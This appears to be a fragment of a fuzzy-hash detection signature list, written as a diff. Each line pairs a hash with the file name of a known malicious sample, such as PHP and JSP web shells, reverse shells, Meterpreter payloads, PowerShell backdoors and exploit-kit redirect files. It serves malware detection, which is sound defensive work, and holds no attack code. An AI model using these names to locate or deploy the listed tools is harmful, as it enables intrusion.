+96:i/k2+XnEyGIaOTepxDljaHn/KSXAPXSta+GX7:kkpADxdaH/KWPc7,"w.jsp"
+96:ijk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:ykpADxdaH/KWPcr,"ROOTtows.jsp"
+96:iiV+TojH46zEOscOMjk/ZfY2scJkedYr00hsibu:iiVYojH46zpscOik/BYncJkEYA0Nq,"reversetcp.py"
+96:iiVa8F+jH4hKfGvE+QSA9KqrCqnatE3q/3q7xDmWcktwrq7644CNZM2+f2Vn:iiojH4EfGvE/7K8CIatE3W3uck2Hin,"curl.py"
+96:iiOYTPjH4uAAE2Epc0RkLItJJRPRUfxkrqtLjeYE19z:iidjH4uAAEJpc0RkLIt7dRUfxxjeYW,"info.py"
+96:iiO9LjH4uQFiOFvKctA/cYAYg2qk7VACwkbrUF9LpJS/eqDKfTMZ7N0A1:iiELjH4uLj9/GYgxk7+CX0F9LTSwuZ0c,"console.py"
+96:iiO3DjH42dBr/iCiE12r1wpWh4HVz+gYQZpVqFcTAu:iiODjH42dBr/iCiE1gwpM4HVz+gYQZpX,"sh.py"
+96:iijwjHNeQA+oS0l6Ll1lNCQbl0k5HCDURV3ZmX9:ii8jHNeQdH0l6Ll1lMQbl0k5HmUk,"meterpreter.py"
+96:iijRajH4OmVO3rq9P0qgm00hscl4BaKce8:iiYjH4OmEe9MqgN0eBge8,"tcp.py"
+96:iijOjWZq4uGcmwb64qgqTfP3rJ675ixTrFdAW4xxRggMcbaMiU5ZXuY:iiijWE4uGcbPnqT3rJtFdTEcGv5,"grep.py"
+96:iijgQDj9+KpCmUVvDCU/GR47W2p62L5TaWte:iicoj9+KpJi0v2g28N,"filesystem.py"
+96:iij1jHHcdCeqtOW18DW4x3o5jl6/h7yChdEef:iihjHH4CO4X6/Ryudn,"upload2web.py"
+96:iHk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:OkpADxdaH/KWPcr,"t.jsp"
+96:igk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:DkpADxdaH/KWPcr,"Customize.jsp"
+96:IfF/u9PQbN+6a2FYNUhhG2poQJe/tJ22Wlftc3HjI/yT/WemK:Is9PQbNPa2uNUh5hJALVWlF2jI6T/W3K,"158.jpg.2.004"
+96:IfF/u9PQbN+6a2FYNUhhG2poQJe/tJ22Wlftc3HjIlT/WemK:Is9PQbNPa2uNUh5hJALVWlF2jIlT/W3K,"158.jpg.2.005"
+96:IfF/u9PQbN+6a2FYNUhhG2poQJe/tJ22Wlftc3HjI3T/WemK:Is9PQbNPa2uNUh5hJALVWlF2jI3T/W3K,"158.jpg.2.001"
+96:IAxFIiZHV6Cm0+X91vNVTtCK9z/jKizp09Sy3g:I0ZZ15mvbxCyzpmSy3g,"exploit.php"
+96:IaRQ2YhekALqAAtRtoMFRjGMNBNujKtvDZdzI/gqkoUGuWIlIXv:IaRrSebyNLNujt+WIlIXv,"KAdot_Universal_Shell_v0.1.6.txt"
+96:IaRQ2YhekALqAAtRtoMFRjGMNBNujKtvDZdzI/gqkoUGC:IaRrSebyNLNujty,"KAdot_Universal_Shell_v0.1.6.php"
+96:iak2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:jkpADxdaH/KWPcr,"zval.jsp"
+96:i7k2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:ukpADxdaH/KWPcr,"ma (1).jsp"
+96:I4lDURcpRK9b1MXMaFYvZ0m/m38GVRsqRm:D2RcDK9IMaiZ0m/m3BVc,"2016-06-30-EITest-flash-redirect-from-lokffd.tk.swf"
+96:i4k2+XnEyGIaOTepxDljaHn/KSXAPXSta+GX7:lkpADxdaH/KWPc7,"ver008.jsp"
+96:I4E6LA0i22YIiNggZBxyW9E0NktyEZHAw8a8qo+29ge2+lUStN:I4E6FX2YIifsW9E0gVHAva8qyh2+P,"allnet.jpg"
+96:i1k2+XnEyGIaOTepxDljaHn/KSXAPXSta+GX7:8kpADxdaH/KWPc7,"info.jsp"
+96:hvZvXy/v3yxvXy7v3yS/AsrrtO0gra4zMfRi0:hvlinC9ibCwfrZO0gu4IZi0,"links.php"
+96:hu+SConrUy2TDKVTmzPEcXFjQZ+Gbaj1Q/YiTUFze5GI6CvZ:hROgmTmYcjQZfbajqpUFq5VZ,"oracle.php.txt"
+96:HSljvEG4qK4tG1yhJ7HRNRtbjkKVkYEw9UyAPWb:WbvtGMzHRNRt3kKKe+M,"Prasadhak.ps1"
+96:HrNwClEshzkvjchKYVUXDeJhxrAnDXHC3eRFm/4AQdlpfVtw22R:HyKEshoixsDhRLA6lpttAR,"file.asp"
+96:+HrhG9EcFU8qZDSffpe6CLdkdOc9gKRIP+P75UhQ6HPBBAV:+LhG9EcJkyf09d3QgKRIPwUhd5BAV,"ssltest.py"
+96:HM+IXuCC6vojZOeDLlSXoeJupQljp8kd7fexp:HM+J6Q0engLAp8jDd7Wxp,"config.php.1"
+96:HM+IprlTtQLNWOeDLlSXoeJupQljp8kd7fexp:HM+4sFengLAp8jDd7Wxp,"config.php.3"
+96:hJ7pGd+bavfSDFgxiGBTt3TMaRuLANrKAAzLovom6OuyccrC9b:hHbav6axi03TMaAyKAAQvz6Oec2b,"pb.txt.1"
+96:Hi4JNJrlnvmPm4QtlRC2EeRDBRZzbaaJWJB2aJHGJhaJSJl2aJQJW9aJqJUJMJXi:CEbrlnvmPm4ozBaCOB2C+hC6l2CcW9C9,"tempe.php"
+96:HGiemBVRmsgvVkirq2QKP1lJ8WMVlMdDoaAyMBB:miHVRmskVkox1lDMVKdNdKB,"procs.py"
+96:H//FnOQntZ4KKxcioqOPUsd8BsVAI//FnOQntZ4KKxcioqOPUsd8Bsk:H//FnOHKGcioqOPUi3b//FnOHKGcioqV,"img.asp"
+96:Hfa0hNh/yloxXPoQl1URXNkVkM505ny0aQFhOJZPs4HLQLklB7WTa3ORXLZZqy:iKL/JxQQD8XuVkM50ZraQSJZPfLQpaO5,"c31d2ae9cc1a08d33cb9c78b342b07be_php.txt"
+96:hdcAmvQPnun1ydQJwcyQU3PjfjD5GiC8J3LYNXqe/CWuXerG5l0uXKeqXk4Z8r+7:pmaiydSwcWfLC8QqTsG8uhqpCrEcqj,"00ba3940a3a56d08798a5de520b44bdd_php.txt"
+96:hBMoG2JXYzitAfaYEW+RDoPbESvT5umquXdPO:hKoGqoziIEoPb3MmquX9O,"2016-04-05-malspam-example-02.eml"
+96:hbeJ3kiQ0iii6ai3fiEQhiZiMCi83Hyw4XyWxTMAlb7bBLY9A6:pk8gkHyw4XyWxTMARbBR6,"air.txt.001"
+96:hBBQvuB0aITHhxrKIl/LPAWw0Fm4wJdbqyKts1nqhMyJgtqvipWK:N3ITT/jdlm4wJdfK6ZzyJgtqvipWK,"defines.php"
+96:HAgq/1EZHiowutHib161Hij19XJHiXjdF8P/pFpRDlZy6AuLQq1F3C451s:Rq/eZHioXtHixcHi59XJHiXpFU/pFpR4,"up.asp"
+96:h7jJN0RD1tR1PzgZa+G/NnvBR9KWX8egr0BLPNIU1vx1RGmoT0tcUQkXkbdgoxdH:hXJN0RDXzrgZaZ/lpR9KWBNFHtPidE6,"bt.php.100"
+96:h3pYK5NNd6rXiTqQv5viv06JpGLIGtKWrhYvYvXvJdzkfMMGyBriW/3onPp1TpEM:h5LXpBa80pOc9wPhdz2BoNd+aCjoN,"shellcode.c"
+96:H2JrWQJ3oy3TrWQJ3oy3MrWQJ3oy33rWQJ3oy38rWQJ3oy37rWQJ3oy30rWQJ3oW:H2J13T13M13313813713013z,"inc.pl"
+96:gvBaU8OaEm7UQeCQWebLmvNW9quGffNIte/Km8A1L1rGhXfC:gvB/b1m/e9WsLmvN4quGtIte/Kmx5rGE,"LogonUser.cpp"
+96:GUw4t4H2rwz4wshMhwt6hewiT6tMhw9CwGXWLwnYu:9RtUGxNgU,"anak.txt"
+96:GMLJv28ilTOUe/lVi3nViYOzEPT6pOdB4+TpAr2PSwTDE5Fa:th9aTCUVVOzEPWpOTJFSwTDE+,"general.js.txt"
+96:gJkG0ZHGkZE0U5kUJU0UEkk5ZEZEWZnJkUkJJ0nZ55Z0kpZWZ3pZmpJnZ3nkWE2A:e,"2016-08-24-pseudoDarkleech-CrypMIC-decrypt-instructions.BMP~"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqlza6D4GJRtv:GiqZdV4GD8/h/KiZEQnTOmzRV,"crimecyber.php.46"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlyPbjDWM0:GiqZdV4GD8/h/KiZEQnTYvDWj,"crimecyber.php.41"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlXsTCoWFmd:GiqZdV4GD8/h/KiZEQnTCCoL,"crimecyber.php.20"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlxoO53PnokKkPoSA51t:GiqZdV4GD8/h/KiZEQnTGLkP4,"crimecyber.php.13"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlWYfnem+xkXS/:GiqZdV4GD8/h/KiZEQnTWWaw4,"crimecyber.php.47"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlvS7fnJQ2:GiqZdV4GD8/h/KiZEQnTaDJ9,"crimecyber.php.31"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlVQQZ4OAT0C:GiqZdV4GD8/h/KiZEQnTVQc4OAd,"crimecyber.php.17"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlVjNZIvltV3:GiqZdV4GD8/h/KiZEQnTlNZIvHV3,"crimecyber.php.38"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqls1kNo/Ro5acR:GiqZdV4GD8/h/KiZEQnTsSWp2,"crimecyber.php.16"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqlr1exf3o4jaG:GiqZdV4GD8/h/KiZEQnTZC3R,"crimecyber.php.23"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlqPbx6l3dYiQQ:GiqZdV4GD8/h/KiZEQnT+g3d9,"crimecyber.php.33"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqlq0cklqyAhbbS7Uwc:GiqZdV4GD8/h/KiZEQnTqMQ3bHwc,"crimecyber.php.27"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqlo0BQ/VxETAv:GiqZdV4GD8/h/KiZEQnToMQ/vpv,"crimecyber.php.7"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlNmzLf7/:GiqZdV4GD8/h/KiZEQnTNkLj/,"crimecyber.php.14"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlM0KvYEAeUfu:GiqZdV4GD8/h/KiZEQnTMbvPLUfu,"crimecyber.php.45"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlLBw0kNOLjSM:GiqZdV4GD8/h/KiZEQnTtwfNwT,"crimecyber.php.19"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljyvIoT0Ag:GiqZdV4GD8/h/KiZEQnTjgIH,"crimecyber.php.48"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljtWjgfLnRFe:GiqZdV4GD8/h/KiZEQnTjtsOTR0,"crimecyber.php.15"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljtFmxOtQCyR:GiqZdV4GD8/h/KiZEQnTjiOKCg,"crimecyber.php.29"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljOro46o6m8:GiqZdV4GD8/h/KiZEQnTjGo4648,"crimecyber.php.39"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljgPqrOYFcOMZh:GiqZdV4GD8/h/KiZEQnTjniYFcrv,"crimecyber.php.44"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljfjfN4FRy8vrZ:GiqZdV4GD8/h/KiZEQnTjfzuFRy0,"crimecyber.php.22"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljeDufjTR8J:GiqZdV4GD8/h/KiZEQnTjeCbTRC,"crimecyber.php.40"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqljd+TDkSYms4S+XS6b:GiqZdV4GD8/h/KiZEQnTjG4SRj,"crimecyber.php.12"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljCJ5OF95v:GiqZdV4GD8/h/KiZEQnTjO8F3v,"crimecyber.php.5"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqljAcd8exfEzTpn:GiqZdV4GD8/h/KiZEQnTjAPWEF,"crimecyber.php.26"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynqlj1HxMw9amMh:GiqZdV4GD8/h/KiZEQnTj1RMwbO,"crimecyber.php.28"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqliW82djHZw:GiqZdV4GD8/h/KiZEQnT02p5w,"crimecyber.php.34"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlIdJxCW/oDJQxYdV:GiqZdV4GD8/h/KiZEQnTIxCQmzb,"crimecyber.php.18"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlG4iFi9/lyc+:GiqZdV4GD8/h/KiZEQnTGjF0/ls,"crimecyber.php.9"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlD/UQ6jOUnoosyVF:GiqZdV4GD8/h/KiZEQnToQzUno70,"crimecyber.php.32"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql+DHdoDFn:GiqZdV4GD8/h/KiZEQnTUHds,"crimecyber.php.42"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlbwiRoBG:GiqZdV4GD8/h/KiZEQnT8iRoA,"crimecyber.php.24"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1QnynqlajmlZsJ0z0:GiqZdV4GD8/h/KiZEQnTd0/,"crimecyber.php.10"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql/aJ81eTKl:GiqZdV4GD8/h/KiZEQnT/X1Rl,"crimecyber.php.21"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql7D/AsOosj+jv:GiqZdV4GD8/h/KiZEQnTPDO7e,"crimecyber.php.43"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql70E4R24Sz:GiqZdV4GD8/h/KiZEQnTp4R24G,"crimecyber.php.35"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql5ggXbV3Iosof53KV3M:GiqZdV4GD8/h/KiZEQnT5jbVI7RV3M,"crimecyber.php.11"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql+4c8/EeBX:GiqZdV4GD8/h/KiZEQnT+pkE+,"crimecyber.php.8"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql3PiZRBqAK8os0/Nz:GiqZdV4GD8/h/KiZEQnTYjNK870J,"crimecyber.php.30"
+96:GiEdOcdV4MSEPBDvV0n47ej/hgOKiljGNR1Qnynql3imHkyJaos9/j4:GiqZdV4GD8/h/KiZEQnT3FB475c,"crimecyber.php.6"
+96:gHLH8xFiuDgApeGGQexQ63G46E7ETbosytxaQJwfyDd34:6LH8xsuDgeMLc4VITbJyaQJOyDdo,"p3webshell.py"
+96:Gfc1wbrqJuJ6CP4z4yW/7G60piMG5hBcMyWorxL3SOXE7kdd:Gfc1c08UpiMG5hWX3gkT,"VirusShare_caad2cc43326413085df14b252e8acc0"
+96:Gfa0hNh/yloxXPoQl1URXNkVkM505ny0aQFhOJZPs4HLQLklB7WTa3ORXLZZq8:/KL/JxQQD8XuVkM50ZraQSJZPfLQpaOx,"bbb.php"
+96:gaRQ2YhekALqAAtRtoMFRjGMNBNujKtvDZoJGFOC09oM7zI/gqkoUGY:gaRrSebyNLNujPJGKT2o,"KA_uShell.v0.1.6.php"
+96:gaRQ2YhekALqAAtRtoMFRjGMNBNujKtvDZdzI/gqkoUGY:gaRrSebyNLNujto,"KA_uShell_by_KAdot_01.v0.1.6.php.txt"
+96:gA0G2OPuJUc+UDOUU8Qq38+DXRfJNC9JUJks8W18o:10GdHJUJko,"Invoke-ADSBackdoor.ps1"
+96:FZXoD2x/+vRN0BbRNNKL7i0/FF5yRdG9tRvDzkW3pjP:zo7iRqLW0/FyRdCxDQmNP,"doc_vHHSjb.js"
+96:fZ4xWxg9pHr8uxtjtmCAr66UhuA+8vNS+UdGf8HBMgSeGDNs91MmSmtZ6WObs5Xe:fZoWxg9pHrftjdqgp+4/UdGf8hMgO02Z,"mal33.php"
+96:fWPxxlX4xJiKyPSWQS6CzyCzPGjpKxCzSC9Q7dQEDAp6/e76CznSZGCTria4Ppw1:+pH4xJiKFWx6WyQGjpKxWS8oqiAp6/q6,"NTFSParserDLL.cpp"
+96:FT4So5pvjNwhqOzAq11MIEV6yGaP9QJk3Ha:FT4So5pLNwhqOzcIEV6J69ok36,"ice.cfm"
+96:FsB5ElUxoOi08w/8EBajzuMA1xIw4AvazLxzdxgx7x/x1q/x0YHMwfnZ:OB0dO6whBajdcFavxzduJ53q/vHMs,"multiflood.php"
+96:fqhMyJZW2hiCoKriLrgQpMQK2pFXWCOnl+EuqFY:fzyJ4VKGLrgQpMQKg1WCE+EvY,"includes.php"
+96:fpAPIDxxT/ff1ht9NpoDVFZIvPk8TjAD92ywAdbV:WPI9xT/ff59NK8k8TjATV,"cpanel_cracker_-_3xp1r3_cyber_army.php.001"
+96:FBux0w6dwqTOn5IVg8sv7BjjxoQh473GMhpUjlPWo:FI661cgjjoxGcpyF,"2016-07-20-EITest-flash-redirect-from-rsupcdn.xyz.swf"
+96:F9VrXbRlhMPs9w6tS1GOqv1tdO1t5vRNb84vpiFHvx0qpCDd/sgvJNe/xZmtbeRJ:FH8i/WTb84vEFHvx0cIzX4PEeaKT,"Out-Java.ps1"
+96:EzMGe3MRt/p0ApzphpiEpfQKpoptCp/s18TnyqxTx1sZGbZ3BLY9A3:EzDUstuqs18TnyqxTx1sZo3BR3,"air.txt"
+96:ewY7usBMPZBhPlpI7bZ/aA8WDQCD1iPoulVF39Ojyk7g6k7f0RGfsY4TKBQotGF:ewY7usin08WDQEsPF30jyksxeGfAKBJ4,"bt.php.92"
+96:eVJr/T/oiQ6er3128yDOmnjv/R/OeN/wCL:ejr/T/oi5er3o8y99/OeN/wS,"Backdoor.ASP.Ace.eg-Serv-U-2-admin.asp"
+96:em/vqwQoejjxE1p9xUSC0Khlho2+lpE8hg9JYtnDCgpfvccr3cznTnIH/ifJpSQ:esvqw92FED96SCnAvgPunF3DWaiJUQ,"bt.php.147"
+96:ELRuIuFkUxPupLcE9dJq8QHgE5lrWvhpOdB4+TpAr2PSwTDES9+:ELRuI8HxPupwE9dQw5pOTJFSwTDES9+,"third-party.js.txt"
+96:EJY0ibMqMxWLM5MYMopqcWYz0ycsAYPmx/4EAtcx0YUQD9FEbxMYOT9x8ew6v85S:EJYvbjGWL4JBpDWYz0bszPmx/5Atcx0c,"ka0tic.pl"
+96:EjFL4eBxPkbYFXAiAlDNxmEC00VHh/smyBAjOACQtwr5w+jwLxw+FkWIlIXv:EjFdBlksNAiAFm700uYWYgB2wWIlIXv,"Dive_Shell_1.0_Emperor_Hacking_Team.txt"
+96:EjFL4eBxPkbYFXAiAlDNxmEC00VHh/smyBAjOACQtwr5w+jwLxw+FK:EjFdBlksNAiAFm700uYWYgB2u,"Dive_Shell_by_Emperor.v1.0.php.txt"
+96:EjFL4eBxPkbYFXAiAlDNxmEC00VHh/smyBAjOACQtwr5w+jwLxw+F0:EjFdBlksNAiAFm700uYWYgB2g,"Dive_Shell_1.0_Emperor_Hacking_Team.php"
+96:ECnPHEO2NxJAXUSxJ1OnkWUCRNLODK3uEsNMBEFAAj0DjYjHjpr:EqWrANEEFAg0n4DB,"Backdoor.ASP.Ace.b-编辑源代码.asp"
+96:e2i44R49DUFDJNx0Hw4JSJ26iHqV9Es/3RG1Eoh5dOrwSMzhaqTm:e2i+CLiHJ626d9EgiEZ,"fox.txt?"
+96:dXI3XEXAXZXVXJXBiXpXMdXYXwXuXwX9XgXRXPXPXX/MSE:dY30wJlZxiZcdIgegNQB/fESE,"http.php"
+96:dux2XQoB9ID+nXHh7miRM6oIW0Xb7XK5hf5IR53L:MxdoBKSnXB7miWoXXb7XKXfiRRL,"history_6843 - 1.js"
+96:dTx2XQoB9IOnXHh7miRH6oIW0Xb7XK5hf5IR53L:RxdoBKOnXB7mipoXXb7XKXfiRRL,"history_5514.js"
+96:dTDF+5nXGvShsHygH9gfYI2qsw/vhNwdwd7rPoF/SOh6y5WxBsi:dF+5nWvShsHygH9gb9sw3hNFdfwF/SOg,"PHT000039204136.js"
+96:dSMczJkpzbn4WGwSe+yp8kWE1OQzzaUFRI1KX10pWIAemv:wz2tDd9Se+oV15JQWOmv,"Nishang_Logo.png"
+96:DpPc9CblnhbX0Koutn/Oes4V6uh4goqgd5+5aagoX4gdw61eelOkgoEgdbyuq4HP:Dq9enhT0KouV6q4C8+UaP4D60eUk8CPP,"wp_config.txt"
+96:DMH/ClM94CLYX8NX3GYp9F6DvXTimDjzVXHVBpTCU:DMHqM2oYX8NXBfF6LXTJVXZ,"ddc0b628bb6c0360c9a369f0a1803f73_php.txt.001.001.001.001.001.001.001.001"
+96:DmFtKpDdHSACn95vXJEYDph7v6zoDL2goNc8zHKZ/vmMx6FjIWbJVO:/DOX6YDb2o3FxWMp,"raw.5317"
+96:Dm3dzJK+Lb+WnnTGf3+tYd7ZNgBZJhYqJfR3yE5ZBIRR8WuNDGYru/CYhpvYi:ClLBn5tYdYJhYLE66SYrcvH,"Backdoor.ASP.Small.j-Serv-U.asp"
+96:dgx2XQoB9IVnXHh7miRwD6oIW0Xb7XK5hf5IR53L:qxdoBKVnXB7miQoXXb7XKXfiRRL,"history_7365 - 3.js"
+96:dcx2XQoB9I4/LenXHh7miRK6oIW0Xb7XK5hf5IR53L:CxdoBK4CnXB7micoXXb7XKXfiRRL,"history_037.js"
+96:DB0Dgn1wTupl2O8kKPcc9C6AzkWE/QFrywlTltaMP4b806JX/jAxB/CyQjmKuRoI:lXn1wtjkKkL54KxltagMid7uCyQqTPYi,"bt.php.155"
+96:DaYTXeMErx4S7SnT9T9wIeK18+SG32ozc6mDYodEMWBvAzmmJt/D6ylKWwBg3sWn:DagXldjwIelIxA64wozz/D6y0nCBSC,"conn.jsp"
+96:Da82oTnur919/1SY5V1CvT5qznjpPyLrSLpTo/IUj/J:O82Kur919/1SMS8znjpPyMTowUJ,"t.php"
+96:Da62oTnur919/1SY58lCvT5qznjpPNq/LrSLpTo/IUj/Y:O62Kur919/1SjC8znjpPNq/MTowUY,"good.txt.1"
+96:d3/4RUZgod/OrjVohG5QUDoxFMIjHCwNlJ9QkakH:dwBk/CjqhG5QsoxxjHCwXl,"proxy.py"
+96:D1fMIqimPbZ+1Wdccc2LJGy6dRZDzMGfGD+E+1I0ZWCFT:DJ+jccc20y6d/DzMGuD+fK3CFT,"Execute-Command-MSSQL.ps1"
+96:Cz35v0C5n6J8pbiMnnnnPJJJJYTTTTz99NVJdXxBVknnnnnqTTTTTz/8+1/1q8zY:Cjmq8SgQdYSd4HqAvyt0svatnSFcR6v,"lfi.pl"
+96:CVarUGZ3tLGVey6fdR5rtwiFninjcN2b1o/G1eO8w:sGqwzfdLJlinjR1b1eW,"php-reverse-shell.php"
+96:CVarUGZ3tLGVbMy6fdR5rtwiFninjcN2b1o/G1eO8w:sGqqzfdLJlinjR1b1eW,"php-reverse-shell.php"
+96:CVarUGZ3tLGV9y6fdR5rtwiFninjcN2b1o/G1eO8w:sGqrzfdLJlinjR1b1eW,"php-reverse-shell.php"
+96:cTsGUmWyQYNWdNMxNNFZ3pEIychFmOGHl4:c4mWyxkPMbZZh0xF4,"up_win32.jsp"
+96:C/tRCwYhBECSJlNop4xsyyA4jH66Ls4efDkZ4llGsBTLvJI:ClRtYhWJlNiWBy/jPOfDTlxTy,"2016-07-25-EITest-flash-redirect-from-ibyfidy.xyz.swf"
+96:CsyFOlUykoQwDxHP4yv79EE0ux0jRcDqOJ6sQq+LGJ+PQxFl/vpA:C5FWUykvSHP4W7uJjCGKr+LGkoxFl/vi,"shell0202020292335.php"
+96:cSLxUcLx3P3ZZIbzLxnJVHzLx0VBzLxbCF:RLxlLx3fZZIbzLxJtzLx0vzLxbCF,"cutstomize.asp"
+96:cpcafpUM1UMhUlAUlhoyaL7yaLqyaLhyaLICpAegxPAegx2AROxdAROxb4cC:6crMKM+lfl+Cqx4xSxrxkJ,"logon.vcxproj"
+96:CNeQg2P7eHJrbxims3WNHAp6N5LOiXDip640rsFGtBZ:CNeiKHJxims3hUN5zDi440rI4BZ,"Invoke-PsGcatAgent.ps1"
+96:Cj8c26mrrR0lSXKXUXvtjeCa+/3PVslZj+/y4ahm:XfPR0lSXKXUX1j8+//VslZjAy3hm,"meter_rev_https.cs"
+96:Cj8c26MQFETwBWaUbXstEC5V2r+1a+kt66yeRryg7YytmnX2p:XuETwYaUbXsunr+I+kt6peRrygM1U,"meter_rev_http.cs"
+96:cFg0HY7KrM1lkQUIL/VBGJQPyTOTx5gEsiN:OHQK667IL/fGSVgELN,"magic.php.3"
+96:c+cBGCN5GURzInHuAMdYCf3rc7WZtujnsotQJfnJ9CHIMA:ciYXjdX3syujnstJ/3l,"Invoke-PoshRatHttp.ps1"
+96:Cb+P9Lzewn6uM+/mBI2oC3RlKqEXP5j2j+z1:CbaewIZBQagJf5j1,"conn.php"
+96:Cb+P9Lzewn6uM+/mBI2oC3MlKqFFP5j2j+z5r4FcqCY8iYuk:CbaewIZBQDgaB5jzBiYF,"conn.php"
+96:C7Y3kuwtEt1mAdMwINVKs/ukL/nUiwQj+Z+b:KY3wtEt1Jdl+V/uy/n/jH,"botw44_shell.v1.0.php.txt"
+96:c4LfHX97luxSpdz5ssP494zdSCsjzlMMDWRHq0:c45ZtdzOk9NqDDWRK0,"VirusShare_115dcf53b11b61799fd63c65f41ff9e7"
+96:Birk2syY4EqxiGGym7Ms3svzpOdB4+TpAr2PSwTDELT:BiwlyYhqqym7MzpOTJFSwTDE3,"comment-reply.min.js.txt"
+96:beaICe6XdNgRNDtMjSOn7Tl9q7EX2hSVXZIXvb/P5Wnm33kBXfxvfXfMUgJLz56e:qaICe6XXgRNZMjSO75YvXyPT1dTocx1Y,"pyopenssl.py"
+96:Be1vo8CnGCRC0t2tJ+GiGHPP8LRIq6P1l3gcPmFYTdxas6e0n:Be1vofNRJt22ImIq6Pj3gYyY3x6eO,"w3af.py"
+96:bDmY9uf5wzwjIZXLizo2kiejfAb/39XgP5YXqHnSQpagEIpsRM2cMLYoYWxOd+uk:bDKfazwybHrfmY5EqzaDIyRIhdWx0/tG,"bt.php.108"
+96:b/DMf+Ukn8XDQbxba8aw86tQU0LMCQsXEmhqn:HnADQbxbajw86L0LpXDhqn,"1.php"
+96:bA091kJYjKZvzELQtAtjeQoXthbRuq/3U9TFntt/FQ1RAOmgfsAjFZU89Am3yHI:c09AlmDoXjbRj/38pnVQ1RAOraIyo,"2016-06-30-page-from-tne.mx-with-injected-script-pointing-to-realstatistics-gate.txt"
+96:ax2v6s6a6s6JuMHniMCiaSw44DynjioFFyRqQs4Gc+rK:Wi6s6a6s6Jx224DWzYoed+O,"bogus.jsp"
+96:AqPmL59RUtpnecSmTuxG4ke7sCBaFJi9JuoI7YYd2rvVbYofPcJMCIJMBazwAzPz:AX4e1ImGgJaFJiT1IMNLfkJVIJJ9rGDo,"TNTHK加密小马.asp"
+96:AqnjN0eZrIb3RDgoaxoFIZmtH8q9DUJn/ehsCyEpqzRjdXMKMTSplXUOBeWDS7aB:znjqeteITqeJevyTlNHtz8aD,"8a3ff64b1d7b1f9675a69889e4d88223_php.txt"
+96:aOFS47mJzyv+8pCZ8ZiBFmbYleeJ5Uut4pTox5Z3Jta1qdzRbs2F7:PS47mJzc+eCaiBFqA74pT8Z3Uy7,"accent_LngRdH.js"
+96:anDqN4IzAvgqoWzo0ho42Wt7+v29j7sXX7oRRcX1y:anDqNNkYG+OZRYy,"udev.txt"
+96:aL8OfuBqVmQ+aERWXFWKW6ry2PPjWmuP90VHeWC2f:S8Of9V/+aLXFWKW6ry2PPjWmu4HeWC2f,"tunnel.tomcat.5.jsp"
+96:aL8OfuBqVmQ+aERgXFWKW6ry2PPjWmuP90VHeWC2f:S8Of9V/+aTXFWKW6ry2PPjWmu4HeWC2f,"tunnel.jsp"
+96:ak+RXr1drd8REXS2wAct6lgEbMsqalEbUo:aRRXqKi2wrtlEAPaU,"formatters.py"
+96:AhQJEedSJlUdIB+BBEt4gBCJFxCfldpdjynRn/bhAbzC6IsAbwj2NDXtFKhvCH5H:AOEe4lUuwBBEt4gBKyrahWznIsWEMD35,"MmUhyAC7UuAT"
+96:AhM15LQ5YsLBCBCYBABFB2AvE4VUHIBUF1wIpKv4Pg1W7pbEYhuybd:TQ5FeSEoUUUFC2g1W7HnB,"transaction_KhpaMt.js"
